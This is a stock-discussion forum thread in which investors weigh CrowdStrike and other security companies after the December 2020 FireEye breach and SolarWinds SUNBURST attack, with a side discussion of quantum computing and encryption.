Crowdstrike results - my thoughts

Sorry for the short post but couldn’t have agreed more on CRWD as I’m feeling elated having written this a few months back.

My biggest holding today is CRWD and I’m happy to have posted this in October:

For those of you who want a quick understanding on how CRWD works and integration with Preempt Security, read the this:

https://discussion.fool.com/thanks-for-the-write-up-ethan-here39…

And this if you wanted to know about competition from Microsoft Defender:

https://discussion.fool.com/this-is-a-great-point-and-thanks-for…

Cheers!

ronjonb

11 Likes

It’s by far my largest position thanks to Saul and the gang, TMF, Bert, and other folks I follow closely. After the FireEye breach was announced after market close today (notably suggesting Sony and EquiFax as vulnerable FireEye customers), I’m curious if these two companies use Crowdstrike in any capacity? You’d think after already having suffered massive breaches in the past they’d be looking to implement a top-tier, cloud-based solution (Crowdstrike, hello). If they’re not already Crowdstrike customers, I’m guessing it won’t be long before they are.

1 Like

ronjob:

The link you posted does not work

https://discussion.fool.com/thanks-for-the-write-up-ethan-here39…

If it is not too much work, can you post the right link ?

Tiptree, thanks for pointing that out.

Here’s the link: https://discussion.fool.com/thanks-for-the-write-up-ethan-here39…

ronjonb

1 Like

I thought about the FireEye news all day. It’s not just the fact that someone (seems to be a nation state) was able to hack into the most protected systems that they had, it’s also what they stole… the tools that FireEye uses to test for vulnerabilities. With those in their hands it’s going to make everything even more insecure…

First reaction was to worry “do I have too much of my portfolio concentrated in one stock that could plummet if something similar happened to them”? If they attacked FireEye you can bet they have also tried to attack Crowdstrike.

Which made me in turn reflect on the reasons I’m invested in CRWD and how they parallel the same reasons CRWD’s clients use them. Trust. To be invested here we have to fundamentally trust that they know what they are doing and have a very very secure product…

From the NY Times “Mr. Mandia, a former Air Force intelligence officer, said the attackers “tailored their world-class capabilities specifically to target and attack FireEye.” He said they appeared to be highly trained in “operational security” and exhibited “discipline and focus,” while moving clandestinely to escape the detection of security tools and forensic examination. Google, Microsoft and other firms that conduct cybersecurity investigations said they had never seen some of these techniques.”
https://www.nytimes.com/2020/12/08/technology/fireeye-hacked…

It’s hard to not be at least a little nervous with this news…

38 Likes

VitamanD, thanks for bringing this up.

Yes, this is an irony and indeed something to be really concerned about when someone you rely on for protecting you are themselves hacked! It’s good that Fireeye has come out openly and disclosed it; which will help the entire community. Hopefully the tools that were stolen are mostly open source software and not private code. Fireye had open sourced many of those red team tools here: https://github.com/fireeye/commando-vm

I also looked at their countermeasures they are working on actively on Github: https://github.com/fireeye/red_team_tool_countermeasures

For those of you interested/invested in CRWD, here are my thoughts…

Attackers these days are sophisticated and are increasingly targeting the software supply chain for weak links and also targeting kernels and firmware. Legacy tools are poor in detecting any tampering with firmware or the kernel. CRWD’s kernel exploit prevention and detection tools looks at malicious drivers and their behaviors and blocks any abnormal behavior at real time. They also compare the firmware on a system across all other systems in the community and can detect and alert about such issues pretty promptly.

Some of these attacks also try to take advantage of built in tools trusted by the Operating System like Powershell in Windows. This is where traditional/ legacy Anti Virus protection fails miserably. Even with this Fireeye hack and the fact that Microsoft is being actively involved with the investigation , I won’t be surprised if Powershell may be in the attack chain ( just a possibility.)

Here’s another example, the Robbinhood ransomware can load and exploit a signed driver to execute kernel code. By using the legitimate signed driver, the ransomware can encrypt the filesystem and present the user with a ransom note.

The good and comforting part for trusting Crowdstrike is that their tools and platform is designed to prevent attacks like the ones mentioned above. Their Threat Intelligence and ML is proven to detect and stop such attacks by blocking the execution of suspicious kernel drivers. They also can continuously get reports of Powershell processes running on all hosts and flag/kill any suspicious processes.

No security company can claim that they can stop breaches and attacks 100% but I feel Crowdstrike comes closest to that and at this point there’s no other competitor that I can think is capable of doing that. Also now with the acceleration of digitization and so many businesses moving to the cloud, Cloud Security is going to be more important than ever!

And since this issue hurts Fireeye’s brand it may be an indirect blessing for CRWD. Hope this helps to bring some comfort to those invested in CRWD ( including myself :slight_smile: ).

Cheers!

ronjonb

76 Likes

Ronjonb,

Thank for the explanation. I was reading Zscaler’s website last night. I was unable to determine whether use of ZS would have hindered or halted the attack. Would ZS have mitigated the issue?

Thanks
Gordon
Long CRWD and ZS

Highly Evasive Attacker Leverages SolarWinds "Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor”… some of you may have seen this news by now.

In my previous post, I had written about how the software supply chain is being increasing targeted by bad actors.

This is what is known at this point…

"SolarWinds.Orion.Core.BusinessLayer.dll is a SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. We are tracking the trojanized version of this SolarWinds Orion plug-in as SUNBURST."

For those of you who are non-technical, a .dll file is a compiled code library.

This is making me think how important security has become at the stage of compilation and building software. Specially with all the CI/CD workflows growing at an exponential rate. The onus on the developer to ensure security is even more important now.

So, it’s nice to see developments like these from DDOG moving in the right direction…

"The Datadog action continuously monitors dependency and version information of code being deployed. By integrating this data with Datadog’s Continuous Profiler and Snyk’s Vulnerability database, this provides a real-time view of what code is actually accessible and vulnerable in production.

Scanning applications for known vulnerabilities often yields a long list of issues that are difficult to prioritize and subsequently fix. With the data collected by the new action, vulnerability analysis will be performed by the Datadog Continuous Profiler based on Snyk vulnerability metadata.

This allows engineering teams to immediately detect when and how often vulnerable methods are invoked in live environments and prioritize their security fixes based on real-world application behavior."

If you’re interested read more here: https://www.helpnetsecurity.com/2020/12/14/datadog-vulnerabi…

As I write this there’s news that DHS has also been compromised alongside Treasury and Commerce depts…

https://www.reuters.com/article/us-global-cyber-usa-dhs/susp…

So, I counting more on CRWD and DDOG to use the information from these hacks to help take security to the next level.

Cheers!

ronjonb

17 Likes

I know it’s a bit forward-looking, since this tech isn’t quite ready yet. But how do you think quantum computing will affect security (and therefore security companies)?

NOVA did a great program a year (maybe more?) ago about quantum computing, and once that tech is available it is supposed to render all our present security useless. Supposedly the only thing that can secure data from a quantum computer attack is another quantum computer. I’m sure there’s much more to it than that, but that’s what the program said. And it would seem like a data security company should/would be planning on that eventuality.

1poorguy

1 Like

Cloudflare (surprise!) is working on it:

Everything that is encrypted with today’s public key cryptography can be decrypted with tomorrow’s quantum computers. Imagine waking up one day, and everyone’s diary from 2020 is suddenly public. Although it’s impossible to find enough storage to record keep all the ciphertext sent over the Internet, there are current and active efforts to collect a lot of it. This makes deploying post-quantum cryptography as soon as possible a pressing privacy concern.

Cloudflare is taking steps to accelerate this transition. First, we endeavor to use post-quantum cryptography for most internal services by the end of 2021. Second, we plan to be among the first services to offer post-quantum cipher suites to customers as standards emerge. We’re optimistic that collaborative efforts among NIST, Microsoft, Cloudflare, and other computing companies will yield a robust, standards-based solution. Although powerful quantum computers are likely in our future, Cloudflare is helping to make sure the Internet is ready for when they arrive.

https://blog.cloudflare.com/securing-the-post-quantum-world/…

Current encryption standards are rendered essentially useless with quantum computing algorithms. Sounds like Cloudflare is working towards a migration to “quantum ready” standards to be better prepared for that future.

20 Likes

Thank you for that. I own DDOG and CRWD. Hopefully they are similarly forward-looking (I need to dig into it more since I own those since I haven’t noticed them mentioning it!). I may have to take another look at Cloudflare. I like that the company is planning beyond the next fiscal year.

1poorguy

1 Like

thanks ronjonb, I was secretly hoping you would comment on the SolarWinds attack and who potentially gains from it going forward but didn’t want to waste a precious post asking you for it. It’s pretty clear who loses…though interesting to me that SolarWinds is only down 17% on the news a drop that is similar in magnitude to what we saw withFireeye the day after their attack was reported. Wondering why they weren’t down more…

I don’t have a great sense of the extent to which this kind of security is sticky and hard to change, presumably these are long term government contracts and it would be hard to switch to another company? And is this something that CRWD could simply step in and replace with their product if asked to do so? Any insights are welcome.

5 Likes

RE quantum computers: They are expected to break conventional RSA encryption using Shor’s algorithm once the computers reach a size of at least 1000 quits. The current largest is around 50 quits, and the difficulty in making them larger doesn’t scale linearly. We expect 10 to 30 years to reach the 1000 qubit quantum computer.

Quantum resistant classical algorithms are being developed and standardised. For these there will be no known quantum algorithm to break them …yet.

Even if everything were to be broken tomorrow, there is some security in obscurity. Initially only governments and very large corporations will have quantum computers, and given the internet traffic, they won’t be wasting precious computing resources on hacking your communications. Quantum computers will also be used for drug discovery and physics simulations that can actually lead to revenue.

One solution is quantum key distribution, where cryptographic key data is exchanged in a manner in which you can determine is there was an eavesdropper. To be truely resistant to the quantum computer you need to use a one-time pad, where every data bit has a key bit. This is very slow.

In summary, there is no immediate threat, and a reasonable countermeasure being developed, so no need to panic.

5 Likes

“I know it’s a bit forward-looking, since this tech isn’t quite ready yet. But how do you think quantum computing will affect security (and therefore security companies)?”

Newsweek just had an article concerning quantum computing. We’re lots closer than I thought.

https://www.newsweek.com/2020/12/25/china-leads-quantum-comp…

2 Likes

“So, I’m counting more on CRWD and DDOG to use the information from these hacks to help take security to the next level.”

CRWD has answered some of that and it is really comforting to read this…

"CrowdStrike® customers using the Falcon Identity Protection solutions are already protected from the recent attacks in three ways. They are:

  1. Proactively protected by the ability to reduce the attack surface with better IT hygiene through the understanding of protocol vulnerabilities (e.g., NTLM), identification of stale privileged accounts, mapping of all service accounts, and other exposures of the identity store

  2. Able to mitigate an attack in progress by detecting, in real time, identity-based attack vectors, including the lateral movement techniques used with victims of the SolarWinds breach

  3. Protected by an automated response of the use of identity-specific attacks, including some of the attack testing tools that were stolen as part of the FireEye breach

In addition, CrowdStrike customers already have several capabilities to help defend against the recently disclosed SolarWinds incident:

  1. Use CrowdStrike Threat Graph® to identify affected hosts:
  • The new SolarWinds Vulnerability Dashboard identifies hosts with IOCs related to the SolarWinds vulnerability, including a look-back ability to see which devices have written the compromised files in the last 90 days.

*The Indicator Graph allows customers to determine whether there has been evidence of affected files and hosts in the past year.

  1. Identify new incidents with specific ML detections:
    Customers will see detections for IOCs related to the SolarWinds vulnerability on hosts with the Cloud ML detection option enabled.

These recent incidents highlight the value of an identity-centric approach to security. CrowdStrike recognizes that security is not always the core business of its customers, but that is why we make it our core business to help protect them.

Read more here: https://www.crowdstrike.com/blog/identity-security-lesson-fr…

Cheers!

ronjonb

P.S. Based upon my thoughts about ZM in another thread and the strength I see in CRWDs offerings, I moved some of my ZM proceeds into CRWD ( which is already an oversized portion for me.) in the past few weeks.

44 Likes

Ronjonb,

Crowd strikes release seems a little like double speak. Of course customers are protected -now- because FireEye made the attack known. Would the use of crowd strike three months ago have detected the attack, or prevented the hack? Would anything have detected the attack? ZScaler?

Just curious
Gordon

3 Likes

Hi Gordon,

The important thing is that no one is 100% proof from these sophisticated attacks ( or safe only till the next attack).
Keep in mind that the whole cybersec community is working on this case right now (and will be probably busy for quite some time). Currently, the ramifications of this attack is till the big unknown and mitigation is going to be super important. For now it looks like Crowdstrike is the only company in this space that appears to have a good understanding and a solid plan for these sort of attacks as indicated by their post ( link in my post above).

"Unfortunately, 2020 has already claimed the regrettable title of having the “highest number of potential intrusions uncovered by Falcon OverWatch in a calendar year.”

CrowdStrike observed more potential intrusions in the first half of 2020 than in all of 2019. 35K in 2019 vs 41K in the 1st half of 2020.

I’m not sure how ZS would have prevented this. The malware was digitally signed by Symantec ( which indicates a supply chain attack).

This is what ZS is saying…

"Working with our cloud infrastructure team, we identified that we do make use of the Orion software internally. After investigating, we have determined that we do not use the vulnerable version and are not impacted by this attack. We have multiple safeguards in place to ensure that only authorized personnel can access this environment.

So I still feel that CRWD is best positioned to detect and mitigate such attacks. Beyond that only Crowdstrike will be able to provide answers to your other questions.

Cheers!

ronjonb

16 Likes

Thanks Ronjonb. I also read the Zscaler statement. Of course the company that could have claimed to have spotted this hack/intrusion wouldn’t be able to burn the money as fast as it would be coming in.

Gordon

As mentioned in my post above…

This dashboard from CrowdStrike and the fact that installing their lightweight agents is so easy could be the best solution that’s needed by companies that have been affected by this attack( currently Microsoft says it’s more than 40 customers).

1. Use CrowdStrike Threat Graph® to identify affected hosts:
* The new SolarWinds Vulnerability Dashboard identifies hosts with IOCs related to the SolarWinds vulnerability, including a look-back ability to see which devices have written the compromised files in the last 90 days.

This alert from CISA is even more alarming.

https://us-cert.cisa.gov/ncas/alerts/aa20-352a

Crowdstrike’s Incident Response and Forensic services should also be greatly helpful.

The CrowdStrike® Incident Response (IR) Services team works collaboratively with organizations to handle critical security incidents and conduct forensic analysis to resolve immediate cyberattacks and implement a long-term solution to stop recurrences.

Cheers!

ronjonb

13 Likes

It’s my highest confidence position and my largest.

Note to self: when one reads this sequence of words from this individual, pay attention.

11 Likes